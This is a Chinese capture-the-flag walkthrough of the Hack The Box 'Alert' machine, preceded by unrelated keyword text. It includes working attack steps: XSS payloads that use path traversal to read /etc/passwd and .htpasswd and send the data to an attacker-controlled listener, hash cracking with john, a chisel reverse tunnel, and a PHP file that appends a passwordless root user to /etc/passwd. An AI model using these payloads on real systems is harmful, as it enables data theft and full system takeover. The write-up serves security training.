如何找到网站管理员,建设销售型网站,工程建设工程信息网,wordpress 企业目录
连接至HTB服务器并启动靶机
信息收集
使用rustscan对靶机TCP端口进行开放扫描
使用nmap对靶机TCP开放端口进行脚本、服务扫描
使用nmap对靶机TCP开放端口进行漏洞、系统扫描
使用nmap对靶机常用UDP端口进行开放扫描
使用ffuf对alert.htb域名进行子域名FUZZ
使用go…目录
连接至HTB服务器并启动靶机
信息收集
使用rustscan对靶机TCP端口进行开放扫描
使用nmap对靶机TCP开放端口进行脚本、服务扫描
使用nmap对靶机TCP开放端口进行漏洞、系统扫描
使用nmap对靶机常用UDP端口进行开放扫描
使用ffuf对alert.htb域名进行子域名FUZZ
使用gobuster对alert.htb域名进行路径FUZZ
边界突破
使用curl访问/messages.php文件
使用浏览器直接访问alert.htb域名
再次构造一个XSS脚本访问/messages.php文件并将响应结果传输回攻击机
本地侧netcat监听后成功收到回显
读取Apache的配置文件其默认路径为/etc/apache2/sites-available/000-default.conf
使用john通过字典爆破该密码哈希
使用ssh通过上述凭证登录靶机
权限提升
查看靶机内部网络连接
攻击机使用chisel开始监听反向连接
通过代理chisel的1080端口访问该服务
进入该WebAPP目录下查看文件权限分配情况
直接通过php代码使其执行系统命令追加一个root用户
在攻击机中使用浏览器或curl访问该文件 连接至HTB服务器并启动靶机 分配IP10.10.16.22 靶机IP10.10.11.44 靶机Domainalert.htb 信息收集
使用rustscan对靶机TCP端口进行开放扫描
rustscan -a alert.htb -r 1-65535 --ulimit 5000 | tee res 使用nmap对靶机TCP开放端口进行脚本、服务扫描
nmap -sT -p22,80 -sCV -Pn alert.htb 使用nmap对靶机TCP开放端口进行漏洞、系统扫描
nmap -sT -p22,80 --scriptvuln -O -Pn alert.htb 使用nmap对靶机常用UDP端口进行开放扫描
nmap -sU --top-ports 20 -Pn alert.htb 使用ffuf对alert.htb域名进行子域名FUZZ
ffuf -u http://alert.htb -H Host: FUZZ.alert.htb -w ../dictionary/subdomains-top20000.txt -t 50 -fw 20 使用gobuster对alert.htb域名进行路径FUZZ
gobuster dir -u http://alert.htb -w ../dictionary/Common-dir.txt -x php,txt -t 50 边界突破
使用curl访问/messages.php文件
curl -v http://alert.htb/messages.php ┌──(root㉿kali)-[/home/kali/Desktop/temp] └─# curl -v http://alert.htb/messages.php * Host alert.htb:80 was resolved. * IPv6: (none) * IPv4: 10.10.11.44 * Trying 10.10.11.44:80... * Connected to alert.htb (10.10.11.44) port 80 * using HTTP/1.x GET /messages.php HTTP/1.1 Host: alert.htb User-Agent: curl/8.11.1 Accept: */* * Request completely sent off HTTP/1.1 200 OK Date: Sun, 02 Feb 2025 13:47:13 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 1 Content-Type: text/html; charsetUTF-8 * Connection #0 to host alert.htb left intact 由回显可见虽然响应码为200但并未返回任何实质内容应该存在访问白名单
使用浏览器直接访问alert.htb域名 可见该页允许上传一个.md文件因此我尝试XSS反弹
script
alert(1)
/script
上传至靶机后由弹窗可知该JS代码被成功解析 再次构造一个XSS脚本访问/messages.php文件并将响应结果传输回攻击机
script
fetch(http://alert.htb/messages.php)
.then(response response.text())
.then(data {fetch(http://10.10.16.22:1425/?file_content encodeURIComponent(data));});
/script
上传至靶机后点击右下角的Share Markdown获得该文件URL 回到主界面找到上方的Contact Us 将URL发送至靶机支持团队 本地侧netcat监听后成功收到回显
nc -lvnp 1425 ┌──(root㉿kali)-[/home/kali/Desktop/temp] └─# nc -lvnp 1425 listening on [any] 1425 ... connect to [10.10.16.22] from (UNKNOWN) [10.10.11.44] 42838 GET /?file_content%3Ch1%3EMessages%3C%2Fh1%3E%3Cul%3E%3Cli%3E%3Ca%20href%3D%27messages.php%3Ffile%3D2024-03-10_15-48-34.txt%27%3E2024-03-10_15-48-34.txt%3C%2Fa%3E%3C%2Fli%3E%3C%2Ful%3E%0A HTTP/1.1 Host: 10.10.16.22:1425 Connection: keep-alive User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/122.0.6261.111 Safari/537.36 Accept: */* Origin: http://alert.htb Referer: http://alert.htb/ Accept-Encoding: gzip, deflate 使用python将内容解码
python -c import urllib.parse; print(urllib.parse.unquote_plus(%3Ch1%3EMessages%3C%2Fh1%3E%3Cul%3E%3Cli%3E%3Ca%20href%3D%27messages.php%3Ffile%3D2024-03-10_15-48-34.txt%27%3E2024-03-10_15-48-34.txt%3C%2Fa%3E%3C%2Fli%3E%3C%2Ful%3E%0A)) ┌──(root㉿kali)-[/home/kali/Desktop/temp] └─# python -c import urllib.parse; print(urllib.parse.unquote_plus(%3Ch1%3EMessages%3C%2Fh1%3E%3Cul%3E%3Cli%3E%3Ca%20href%3D%27messages.php%3Ffile%3D2024-03-10_15-48-34.txt%27%3E2024-03-10_15-48-34.txt%3C%2Fa%3E%3C%2Fli%3E%3C%2Ful%3E%0A)) h1Messages/h1ullia hrefmessages.php?file2024-03-10_15-48-34.txt2024-03-10_15-48-34.txt/a/li/ul 此处我注意到地址messages.php?file2024-03-10_15-48-34.txt由此可见messages.php允许接收一个file参数因此我尝试通过它进行本地文件读取
script
fetch(http://alert.htb/messages.php?file../../../../../../../../../etc/passwd)
.then(response response.text())
.then(data {fetch(http://10.10.16.22:1425/?file_content encodeURIComponent(data));});
/script
如法炮制上面的步骤成功收到响应 ┌──(root㉿kali)-[/home/kali/Desktop/temp] └─# nc -lvnp 1425 listening on [any] 1425 ... connect to [10.10.16.22] from (UNKNOWN) [10.10.11.44] 52334 GET /?file_content%3Cpre%3Eroot%3Ax%3A0%3A0%3Aroot%3A%2Froot%3A%2Fbin%2Fbash%0Adaemon%3Ax%3A1%3A1%3Adaemon%3A%2Fusr%2Fsbin%3A%2Fusr%2Fsbin%2Fnologin%0Abin%3Ax%3A2%3A2%3Abin%3A%2Fbin%3A%2Fusr%2Fsbin%2Fnologin%0Asys%3Ax%3A3%3A3%3Asys%3A%2Fdev%3A%2Fusr%2Fsbin%2Fnologin%0Async%3Ax%3A4%3A65534%3Async%3A%2Fbin%3A%2Fbin%2Fsync%0Agames%3Ax%3A5%3A60%3Agames%3A%2Fusr%2Fgames%3A%2Fusr%2Fsbin%2Fnologin%0Aman%3Ax%3A6%3A12%3Aman%3A%2Fvar%2Fcache%2Fman%3A%2Fusr%2Fsbin%2Fnologin%0Alp%3Ax%3A7%3A7%3Alp%3A%2Fvar%2Fspool%2Flpd%3A%2Fusr%2Fsbin%2Fnologin%0Amail%3Ax%3A8%3A8%3Amail%3A%2Fvar%2Fmail%3A%2Fusr%2Fsbin%2Fnologin%0Anews%3Ax%3A9%3A9%3Anews%3A%2Fvar%2Fspool%2Fnews%3A%2Fusr%2Fsbin%2Fnologin%0Auucp%3Ax%3A10%3A10%3Auucp%3A%2Fvar%2Fspool%2Fuucp%3A%2Fusr%2Fsbin%2Fnologin%0Aproxy%3Ax%3A13%3A13%3Aproxy%3A%2Fbin%3A%2Fusr%2Fsbin%2Fnologin%0Awww-data%3Ax%3A33%3A33%3Awww-data%3A%2Fvar%2Fwww%3A%2Fusr%2Fsbin%2Fnologin%0Abackup%3Ax%3A34%3A34%3Abackup%3A%2Fvar%2Fbackups%3A%2Fusr%2Fsbin%2Fnologin%0Alist%3Ax%3A38%3A38%3AMailing%20List%20Manager%3A%2Fvar%2Flist%3A%2Fusr%2Fsbin%2Fnologin%0Airc%3Ax%3A39%3A39%3Aircd%3A%2Fvar%2Frun%2Fircd%3A%2Fusr%2Fsbin%2Fnologin%0Agnats%3Ax%3A41%3A41%3AGnats%20Bug-Reporting%20System%20(admin)%3A%2Fvar%2Flib%2Fgnats%3A%2Fusr%2Fsbin%2Fnologin%0Anobody%3Ax%3A65534%3A65534%3Anobody%3A%2Fnonexistent%3A%2Fusr%2Fsbin%2Fnologin%0Asystemd-network%3Ax%3A100%3A102%3Asystemd%20Network%20Management%2C%2C%2C%3A%2Frun%2Fsystemd%3A%2Fusr%2Fsbin%2Fnologin%0Asystemd-resolve%3Ax%3A101%3A103%3Asystemd%20Resolver%2C%2C%2C%3A%2Frun%2Fsystemd%3A%2Fusr%2Fsbin%2Fnologin%0Asystemd-timesync%3Ax%3A102%3A104%3Asystemd%20Time%20Synchronization%2C%2C%2C%3A%2Frun%2Fsystemd%3A%2Fusr%2Fsbin%2Fnologin%0Amessagebus%3Ax%3A103%3A106%3A%3A%2Fnonexistent%3A%2Fusr%2Fsbin%2Fnologin%0Asyslog%3Ax%3A104%3A110%3A%3A%2Fhome%2Fsyslog%3A%2Fusr%2Fsbin%2Fnologin%0A_apt%3Ax%3A105%3A65534%3A%3A%2Fnonexistent%3A%2Fusr%2Fsbin%2Fnologin%0Atss%3Ax%3A106%3A111%3ATPM%20software%20stack%2C%2C%2C%3A%2Fvar%2Flib%2Ftpm%3A%2Fbin%2Ffalse%0Auuidd%3Ax%3A107%3A112%3A%3A%2Frun%2Fuuidd%3A%2Fusr%2Fsbin%2Fnologin%0Atcpdump%3Ax%3A108%3A113%3A%3A%2Fnonexistent%3A%2Fusr%2Fsbin%2Fnologin%0Alandscape%3Ax%3A109%3A115%3A%3A%2Fvar%2Flib%2Flandscape%3A%2Fusr%2Fsbin%2Fnologin%0Apollinate%3Ax%3A110%3A1%3A%3A%2Fvar%2Fcache%2Fpollinate%3A%2Fbin%2Ffalse%0Afwupd-refresh%3Ax%3A111%3A116%3Afwupd-refresh%20user%2C%2C%2C%3A%2Frun%2Fsystemd%3A%2Fusr%2Fsbin%2Fnologin%0Ausbmux%3Ax%3A112%3A46%3Ausbmux%20daemon%2C%2C%2C%3A%2Fvar%2Flib%2Fusbmux%3A%2Fusr%2Fsbin%2Fnologin%0Asshd%3Ax%3A113%3A65534%3A%3A%2Frun%2Fsshd%3A%2Fusr%2Fsbin%2Fnologin%0Asystemd-coredump%3Ax%3A999%3A999%3Asystemd%20Core%20Dumper%3A%2F%3A%2Fusr%2Fsbin%2Fnologin%0Aalbert%3Ax%3A1000%3A1000%3Aalbert%3A%2Fhome%2Falbert%3A%2Fbin%2Fbash%0Alxd%3Ax%3A998%3A100%3A%3A%2Fvar%2Fsnap%2Flxd%2Fcommon%2Flxd%3A%2Fbin%2Ffalse%0Adavid%3Ax%3A1001%3A1002%3A%2C%2C%2C%3A%2Fhome%2Fdavid%3A%2Fbin%2Fbash%0A%3C%2Fpre%3E%0A HTTP/1.1 Host: 10.10.16.22:1425 Connection: keep-alive User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/122.0.6261.111 Safari/537.36 Accept: */* Origin: http://alert.htb Referer: http://alert.htb/ Accept-Encoding: gzip, deflate 使用python对其解码
python -c import urllib.parse; print(urllib.parse.unquote_plus(%3Cpre%3Eroot%3Ax%3A0%3A0%3Aroot%3A%2Froot%3A%2Fbin%2Fbash%0Adaemon%3Ax%3A1%3A1%3Adaemon%3A%2Fusr%2Fsbin%3A%2Fusr%2Fsbin%2Fnologin%0Abin%3Ax%3A2%3A2%3Abin%3A%2Fbin%3A%2Fusr%2Fsbin%2Fnologin%0Asys%3Ax%3A3%3A3%3Asys%3A%2Fdev%3A%2Fusr%2Fsbin%2Fnologin%0Async%3Ax%3A4%3A65534%3Async%3A%2Fbin%3A%2Fbin%2Fsync%0Agames%3Ax%3A5%3A60%3Agames%3A%2Fusr%2Fgames%3A%2Fusr%2Fsbin%2Fnologin%0Aman%3Ax%3A6%3A12%3Aman%3A%2Fvar%2Fcache%2Fman%3A%2Fusr%2Fsbin%2Fnologin%0Alp%3Ax%3A7%3A7%3Alp%3A%2Fvar%2Fspool%2Flpd%3A%2Fusr%2Fsbin%2Fnologin%0Amail%3Ax%3A8%3A8%3Amail%3A%2Fvar%2Fmail%3A%2Fusr%2Fsbin%2Fnologin%0Anews%3Ax%3A9%3A9%3Anews%3A%2Fvar%2Fspool%2Fnews%3A%2Fusr%2Fsbin%2Fnologin%0Auucp%3Ax%3A10%3A10%3Auucp%3A%2Fvar%2Fspool%2Fuucp%3A%2Fusr%2Fsbin%2Fnologin%0Aproxy%3Ax%3A13%3A13%3Aproxy%3A%2Fbin%3A%2Fusr%2Fsbin%2Fnologin%0Awww-data%3Ax%3A33%3A33%3Awww-data%3A%2Fvar%2Fwww%3A%2Fusr%2Fsbin%2Fnologin%0Abackup%3Ax%3A34%3A34%3Abackup%3A%2Fvar%2Fbackups%3A%2Fusr%2Fsbin%2Fnologin%0Alist%3Ax%3A38%3A38%3AMailing%20List%20Manager%3A%2Fvar%2Flist%3A%2Fusr%2Fsbin%2Fnologin%0Airc%3Ax%3A39%3A39%3Aircd%3A%2Fvar%2Frun%2Fircd%3A%2Fusr%2Fsbin%2Fnologin%0Agnats%3Ax%3A41%3A41%3AGnats%20Bug-Reporting%20System%20(admin)%3A%2Fvar%2Flib%2Fgnats%3A%2Fusr%2Fsbin%2Fnologin%0Anobody%3Ax%3A65534%3A65534%3Anobody%3A%2Fnonexistent%3A%2Fusr%2Fsbin%2Fnologin%0Asystemd-network%3Ax%3A100%3A102%3Asystemd%20Network%20Management%2C%2C%2C%3A%2Frun%2Fsystemd%3A%2Fusr%2Fsbin%2Fnologin%0Asystemd-resolve%3Ax%3A101%3A103%3Asystemd%20Resolver%2C%2C%2C%3A%2Frun%2Fsystemd%3A%2Fusr%2Fsbin%2Fnologin%0Asystemd-timesync%3Ax%3A102%3A104%3Asystemd%20Time%20Synchronization%2C%2C%2C%3A%2Frun%2Fsystemd%3A%2Fusr%2Fsbin%2Fnologin%0Amessagebus%3Ax%3A103%3A106%3A%3A%2Fnonexistent%3A%2Fusr%2Fsbin%2Fnologin%0Asyslog%3Ax%3A104%3A110%3A%3A%2Fhome%2Fsyslog%3A%2Fusr%2Fsbin%2Fnologin%0A_apt%3Ax%3A105%3A65534%3A%3A%2Fnonexistent%3A%2Fusr%2Fsbin%2Fnologin%0Atss%3Ax%3A106%3A111%3ATPM%20software%20stack%2C%2C%2C%3A%2Fvar%2Flib%2Ftpm%3A%2Fbin%2Ffalse%0Auuidd%3Ax%3A107%3A112%3A%3A%2Frun%2Fuuidd%3A%2Fusr%2Fsbin%2Fnologin%0Atcpdump%3Ax%3A108%3A113%3A%3A%2Fnonexistent%3A%2Fusr%2Fsbin%2Fnologin%0Alandscape%3Ax%3A109%3A115%3A%3A%2Fvar%2Flib%2Flandscape%3A%2Fusr%2Fsbin%2Fnologin%0Apollinate%3Ax%3A110%3A1%3A%3A%2Fvar%2Fcache%2Fpollinate%3A%2Fbin%2Ffalse%0Afwupd-refresh%3Ax%3A111%3A116%3Afwupd-refresh%20user%2C%2C%2C%3A%2Frun%2Fsystemd%3A%2Fusr%2Fsbin%2Fnologin%0Ausbmux%3Ax%3A112%3A46%3Ausbmux%20daemon%2C%2C%2C%3A%2Fvar%2Flib%2Fusbmux%3A%2Fusr%2Fsbin%2Fnologin%0Asshd%3Ax%3A113%3A65534%3A%3A%2Frun%2Fsshd%3A%2Fusr%2Fsbin%2Fnologin%0Asystemd-coredump%3Ax%3A999%3A999%3Asystemd%20Core%20Dumper%3A%2F%3A%2Fusr%2Fsbin%2Fnologin%0Aalbert%3Ax%3A1000%3A1000%3Aalbert%3A%2Fhome%2Falbert%3A%2Fbin%2Fbash%0Alxd%3Ax%3A998%3A100%3A%3A%2Fvar%2Fsnap%2Flxd%2Fcommon%2Flxd%3A%2Fbin%2Ffalse%0Adavid%3Ax%3A1001%3A1002%3A%2C%2C%2C%3A%2Fhome%2Fdavid%3A%2Fbin%2Fbash%0A%3C%2Fpre%3E%0A)) preroot:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin messagebus:x:103:106::/nonexistent:/usr/sbin/nologin syslog:x:104:110::/home/syslog:/usr/sbin/nologin _apt:x:105:65534::/nonexistent:/usr/sbin/nologin tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin pollinate:x:110:1::/var/cache/pollinate:/bin/false fwupd-refresh:x:111:116:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin usbmux:x:112:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin sshd:x:113:65534::/run/sshd:/usr/sbin/nologin systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin albert:x:1000:1000:albert:/home/albert:/bin/bash lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false david:x:1001:1002:,,,:/home/david:/bin/bash /pre 读取Apache的配置文件其默认路径为/etc/apache2/sites-available/000-default.conf
获得响应 ┌──(root㉿kali)-[/home/kali/Desktop/temp] └─# nc -lvnp 1425 listening on [any] 1425 ... connect to [10.10.16.22] from (UNKNOWN) [10.10.11.44] 41872 GET /?file_content%3Cpre%3E%3CVirtualHost%20*%3A80%3E%0A%20%20%20%20ServerName%20alert.htb%0A%0A%20%20%20%20DocumentRoot%20%2Fvar%2Fwww%2Falert.htb%0A%0A%20%20%20%20%3CDirectory%20%2Fvar%2Fwww%2Falert.htb%3E%0A%20%20%20%20%20%20%20%20Options%20FollowSymLinks%20MultiViews%0A%20%20%20%20%20%20%20%20AllowOverride%20All%0A%20%20%20%20%3C%2FDirectory%3E%0A%0A%20%20%20%20RewriteEngine%20On%0A%20%20%20%20RewriteCond%20%25%7BHTTP_HOST%7D%20!%5Ealert%5C.htb%24%0A%20%20%20%20RewriteCond%20%25%7BHTTP_HOST%7D%20!%5E%24%0A%20%20%20%20RewriteRule%20%5E%2F%3F(.*)%24%20http%3A%2F%2Falert.htb%2F%241%20%5BR%3D301%2CL%5D%0A%0A%20%20%20%20ErrorLog%20%24%7BAPACHE_LOG_DIR%7D%2Ferror.log%0A%20%20%20%20CustomLog%20%24%7BAPACHE_LOG_DIR%7D%2Faccess.log%20combined%0A%3C%2FVirtualHost%3E%0A%0A%3CVirtualHost%20*%3A80%3E%0A%20%20%20%20ServerName%20statistics.alert.htb%0A%0A%20%20%20%20DocumentRoot%20%2Fvar%2Fwww%2Fstatistics.alert.htb%0A%0A%20%20%20%20%3CDirectory%20%2Fvar%2Fwww%2Fstatistics.alert.htb%3E%0A%20%20%20%20%20%20%20%20Options%20FollowSymLinks%20MultiViews%0A%20%20%20%20%20%20%20%20AllowOverride%20All%0A%20%20%20%20%3C%2FDirectory%3E%0A%0A%20%20%20%20%3CDirectory%20%2Fvar%2Fwww%2Fstatistics.alert.htb%3E%0A%20%20%20%20%20%20%20%20Options%20Indexes%20FollowSymLinks%20MultiViews%0A%20%20%20%20%20%20%20%20AllowOverride%20All%0A%20%20%20%20%20%20%20%20AuthType%20Basic%0A%20%20%20%20%20%20%20%20AuthName%20%22Restricted%20Area%22%0A%20%20%20%20%20%20%20%20AuthUserFile%20%2Fvar%2Fwww%2Fstatistics.alert.htb%2F.htpasswd%0A%20%20%20%20%20%20%20%20Require%20valid-user%0A%20%20%20%20%3C%2FDirectory%3E%0A%0A%20%20%20%20ErrorLog%20%24%7BAPACHE_LOG_DIR%7D%2Ferror.log%0A%20%20%20%20CustomLog%20%24%7BAPACHE_LOG_DIR%7D%2Faccess.log%20combined%0A%3C%2FVirtualHost%3E%0A%0A%3C%2Fpre%3E%0A HTTP/1.1 Host: 10.10.16.22:1425 Connection: keep-alive User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/122.0.6261.111 Safari/537.36 Accept: */* Origin: http://alert.htb Referer: http://alert.htb/ Accept-Encoding: gzip, deflate 使用CyberChef进行解码可见.htpasswd文件路径/var/www/statistics.alert.htb/.htpasswd 读取.htpasswd文件 ┌──(root㉿kali)-[/home/kali/Desktop/temp] └─# nc -lvnp 1425 listening on [any] 1425 ... connect to [10.10.16.22] from (UNKNOWN) [10.10.11.44] 34862 GET /?file_content%3Cpre%3Ealbert%3A%24apr1%24bMoRBJOg%24igG8WBtQ1xYDTQdLjSWZQ%2F%0A%3C%2Fpre%3E%0A HTTP/1.1 Host: 10.10.16.22:1425 Connection: keep-alive User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/122.0.6261.111 Safari/537.36 Accept: */* Origin: http://alert.htb Referer: http://alert.htb/ Accept-Encoding: gzip, deflate 再次使用CyberChef解码获得一份凭证 账户albert 密码哈希$apr1$bMoRBJOg$igG8WBtQ1xYDTQdLjSWZQ/ 将该密码哈希存入文件中
echo $apr1$bMoRBJOg$igG8WBtQ1xYDTQdLjSWZQ/ hash
使用john通过字典爆破该密码哈希
john hash --wordlist../dictionary/rockyou.txt --formatmd5crypt-long 获得完整凭证 账户albert 密码manchesterunited 使用ssh通过上述凭证登录靶机
ssh albertalert.htb 在/home/albert目录下找到user.txt文件 albertalert:~$ ls user.txt albertalert:~$ pwd /home/albert albertalert:~$ cat user.txt c7756c23c61c6bfe638b9ef0f5dd21a2 权限提升
查看靶机内部网络连接
ss -tlnp 可见8080端口仅允许本地访问使用chisel将其映射至攻击机
攻击机使用chisel开始监听反向连接
chisel server -p 8888 --reverse
控制靶机连接至攻击机chisel服务器
./chisel64 client 10.10.16.22:8888 R:socks
攻击机chisel服务端收到连接回显 ┌──(root㉿kali)-[/home/kali/Desktop/temp] └─# chisel server -p 8888 --reverse 2025/02/02 14:08:39 server: Reverse tunnelling enabled 2025/02/02 14:08:39 server: Fingerprint 25IPnk94XCxFCwNdUr/eR2Fh8awqZSx87sFGotha4 2025/02/02 14:08:39 server: Listening on http://0.0.0.0:8888 2025/02/02 14:09:22 server: session#1: Client version (1.10.1) differs from server version (1.10.1-0kali1) 2025/02/02 14:09:22 server: session#1: tun: proxy#R:127.0.0.1:1080socks: Listening 通过代理chisel的1080端口访问该服务
可见该WebAPP为Website Monitor 查看靶机进程也可应验
ps -aux | grep 8080
由输出可知该进程由root用户启动 albertalert:/tmp$ ps -aux | grep 8080 root 1001 0.0 0.6 207256 26552 ? Ss 09:59 0:00 /usr/bin/php -S 127.0.0.1:8080 -t /opt/website-monitor albert 5254 0.0 0.0 6432 724 pts/0 S 14:56 0:00 grep --colorauto 8080 进入该WebAPP目录下查看文件权限分配情况
cd /opt/website-monitor 由输出可见monitors目录允许其他用户写入
直接通过php代码使其执行系统命令追加一个root用户
首先进入该目录中
cd monitors
在/etc/passwd文件中追加root用户
echo ?php exec(echo x0da6h::0:0:x0da6h:/root:/bin/bash /etc/passwd); ? x0da6h.php
在攻击机中使用浏览器或curl访问该文件 回到靶机中查看/etc/passwd文件可见该用户被成功追加 直接切换到该用户
su x0da6h albertalert:~$ su x0da6h rootalert:/home/albert# id uid0(root) gid0(root) groups0(root) rootalert:/home/albert# whoami root 在/root目录下找到root.txt文件 rootalert:~# pwd /root rootalert:~# ls root.txt scripts rootalert:~# cat root.txt f8e13577a1c0404ce343be234410e3d1
